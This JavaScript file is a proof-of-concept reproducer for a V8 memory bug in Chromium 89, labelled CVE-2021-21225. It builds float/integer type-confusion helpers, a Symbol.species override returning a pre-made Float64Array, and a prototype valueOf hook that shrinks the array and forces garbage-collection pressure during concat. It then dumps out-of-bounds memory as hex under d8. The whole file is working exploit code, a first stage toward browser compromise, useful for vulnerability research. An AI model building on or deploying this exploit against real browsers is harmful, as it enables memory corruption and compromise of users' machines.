// Reproducer for Chromium 89.0.4389.114, issue 1195977 (CVE-2021-21225)
// One 8-byte scratch buffer with three views over the same bytes (f64.buffer):
// a double, one unsigned 64-bit word, and two unsigned 32-bit words. The
// helpers below write through one view and read back through another, so they
// all share this module-level state.
var f64 = new Float64Array(1);
var bigUint64 = new BigUint64Array(f64.buffer);
var u32 = new Uint32Array(f64.buffer);
/**
 * Reinterpret a double's IEEE-754 bit pattern as an unsigned 64-bit BigInt.
 * Routes through the shared f64/bigUint64 views of the module scratch buffer.
 * @param {number} f - value whose raw bits are wanted
 * @returns {bigint} the 64 bits of f as an unsigned integer
 */
function ftoi(f) {
  f64[0] = f;
  const [bits] = bigUint64;
  return bits;
}
/**
 * Inverse of ftoi: build the double whose bit pattern is the given BigInt.
 * @param {bigint} i - 64-bit unsigned value (wrapped modulo 2^64 by the view)
 * @returns {number} the double with exactly those bits
 */
function itof(i) {
  bigUint64[0] = i;
  const [asDouble] = f64;
  return asDouble;
}
/**
 * Low 32 bits of a double's bit pattern (little-endian word 0 of the buffer).
 * @param {number} double
 * @returns {number} unsigned 32-bit low word
 */
function getLow(double) {
  f64[0] = double;
  const [lo] = u32;
  return lo;
}
/**
 * High 32 bits of a double's bit pattern (little-endian word 1 of the buffer).
 * @param {number} double
 * @returns {number} unsigned 32-bit high word
 */
function getHigh(double) {
  f64[0] = double;
  const [, hi] = u32;
  return hi;
}
/**
 * Assemble a double from its two 32-bit halves.
 * @param {number} low - low word (coerced to Uint32 by the view)
 * @param {number} high - high word (coerced to Uint32 by the view)
 * @returns {number} the double whose bit pattern is high:low
 */
function u32Tof64(low, high) {
  u32.set([low, high]);
  const [asDouble] = f64;
  return asDouble;
}
/**
 * Assemble a double from two 32-bit words; same contract as u32Tof64.
 * @param {number} lo - low word
 * @param {number} hi - high word
 * @returns {number} the double with bit pattern hi:lo
 */
function u2d(lo, hi) {
  [u32[0], u32[1]] = [lo, hi];
  return f64[0];
}
/**
 * Expose a double's bit pattern as two 32-bit words.
 * @param {number} v - value to split
 * @returns {Uint32Array} the SHARED u32 view (not a copy): index 0 is the low
 *   word, index 1 the high word, and any later helper call overwrites it
 */
function d2u(v) {
  const sharedWords = u32;
  f64[0] = v;
  return sharedWords;
}
/**
 * Format an integer (Number or BigInt) as lowercase hex, zero-padded to at
 * least 8 digits. Longer values are not truncated.
 * @param {number|bigint} i
 * @returns {string}
 */
function hex(i) {
  const digits = i.toString(16);
  return digits.padStart(8, "0");
}
/**
 * Apply allocation pressure by creating 64 unreferenced 1 MiB ArrayBuffers.
 * Whether this actually triggers a collection is up to the engine.
 * @returns {undefined}
 */
function gc() {
  for (let round = 0; round < 64; round++) {
    new ArrayBuffer(0x100000);
  }
}
// Float64Array subclass; an instance of it is handed back as the species result below.
class Leaky extends Float64Array {}
// Pre-allocated instance returned by MyArray's species constructor. Its
// 'length' gets an own setter that does nothing, so assignments to
// leak_array.length are ignored.
let leak_array = new Leaky(1000);
leak_array.__defineSetter__('length', function() {});
/**
 * Array subclass whose species constructor ignores the requested length and
 * always yields the pre-existing leak_array. A plain function (not an arrow)
 * is returned because the engine constructs it with `new`.
 */
class MyArray extends Array {
  static get [Symbol.species]() {
    const speciesCtor = function speciesCtor() {
      return leak_array;
    };
    return speciesCtor;
  }
}
// Array using the species override above: fill it, then delete index 1 so
// that slot is a hole (reads of w[1] fall through to Array.prototype[1]).
var w = new MyArray(300);
w.fill(1.1);
delete w[1];
// Object found at the hole via the prototype. Its valueOf truncates w to a
// single element, applies allocation pressure with gc(), removes itself from
// Array.prototype, and yields 1.1.
Array.prototype[1] = {
  valueOf: function() {
    w.length = 1;
    gc();
    delete Array.prototype[1];
    return 1.1;
  }
};
// concat goes through the species constructor, so c is expected to be leak_array.
var c = Array.prototype.concat.call(w);
// %DebugPrint and print are d8-only (d8 needs --allow-natives-syntax for the
// % natives); this file does not run under Node or in a browser.
%DebugPrint(w);
%DebugPrint(c);
%DebugPrint(leak_array);
// Dump the raw bits of the first 32 entries of leak_array as hex.
for (var i = 0; i < 32; i++) {
  print(hex(ftoi(leak_array[i])));
}